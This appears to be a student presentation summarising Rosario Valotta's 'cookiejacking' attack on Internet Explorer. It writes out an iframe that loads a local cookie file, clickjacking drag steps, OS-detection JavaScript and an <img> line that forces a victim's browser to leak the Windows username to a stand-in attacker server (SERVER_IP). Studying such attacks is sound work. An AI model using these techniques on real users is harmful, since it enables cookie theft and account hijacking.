Security researcher finds 'cookiejacking' risk in IE

報告者：劉旭哲

• Rosario Valotta (Italy) 在本月於瑞士及阿姆斯特丹舉辦的資安會議上展示研究發現– Could enable hackers to steal cookies from a PC

and then log onto password-protected Web sites.– Internet Explorer– 社群網路– Cookiejacking

• Overview IE security zones– IE have 5 default zone: ( 特權高至低 )• Local Machine Zone• Local Intranet Zone• Trusted Sites Zone• Internet Zone• Restrited Sites Zone

• If Web page want to access local machine file, it will.

• So it should be impossible for a web content to access local machine files.

• So , how to “Cookiejacking” ?1. Load cookie file to iframe

<iframe src="file:///C:/Documents and Settings/Username/Cookies/Username@Website[1].txt”></iframe>

2. Find a way to access cookie3. Guess Victim’s Username4. Guess Victim’s OS

2. Find a way to access cookie:• Use Javascript

– Same Origin Policy will block any programmatic access to a local iframe content from web domains

• Use Clickjacking– Iframes overlapping

» Iframe properly positioned– CSS opacity

» Iframe made invisible– User clicks “hijacked”

• Advanced Clickjacking– content extraction

• Content extraction:1. Third party iframe is positioned on the start point of the

selection (A)2. The victim starts to select content (e.g. text or html)3. Third party iframe is positioned on the end point of the

selection (B)4. The victim stops selecting5. Third party iframe is positioned somewhere between A

and B6. The victim drags the selected content into an attacker

controlled iframe

• VIDEO

Information that attacker wanted

欺騙受害者的圖片 (球 )

受害者試圖把球拖到籃框實際上是選擇了攻擊者要的文字

攻擊者控制的 iframe

3. Guess Victim’s Username• file:///C:/Documents and Settings/ Username /Cookies/

Username @Website[1].txt• The path of the cookie folder depends on the username

currently logged on• IE supports access to file system objects on SMB shares

– Uses UNC (Universal Naming Convention) paths to reference them

– Can be used without restrictions inside web pages in the Internet zone or above

• Access a img file:– force victim's browser to retrieve a resource like <img src="\\SERVER_IP\img.jpg">– it will start a NTLM challenge-response negotiation with the

remote server– as a part of this negotiation, it sends Windows Username in

clear plain text– Attacker only use a script to sniff data on TCP port 445 in order

to grab the username.

4. Guess Victim’s OS• The OS version can be retrieved through a little JS:

– XP = navigator.userAgent.indexOf("Windows NT 5.1");– Vista= navigator.userAgent.indexOf("Windows NT 6.0");– Win7= navigator.userAgent.indexOf("Windows NT 6.1");

• Different OSs store cookies in different paths:– Windows XP

» C:/Documents and Settings/user/Cookies/– Vista and 7

» C:/Users/user/AppData/Roaming/Microsoft/Windows/Cookies/Low/

• Only define iframes to load valid cookies (1 iframe loads 1 cookie)

• Cookiejacking DEMO Video

Conclusion

• Allows an attacker to steal session cookies, no XSS needed

• Web site independent: it’s a browser flaw• No clickjacking, no cookiejacking• Valotta 實驗結果：– Facebook with 150 friends.– got above 80 cookies in 3 days

• But Microsoft consider ：– 仰賴相當程度的互動 ( 欺騙 + 拖曳 ) ，因此認為

用戶受攻擊可能性不大

Reference

• http://news.cnet.com/8301-1009_3-20066419-83.html?part=rss&tag=feed&subj=News-Security

• http://sites.google.com/site/tentacoloviola/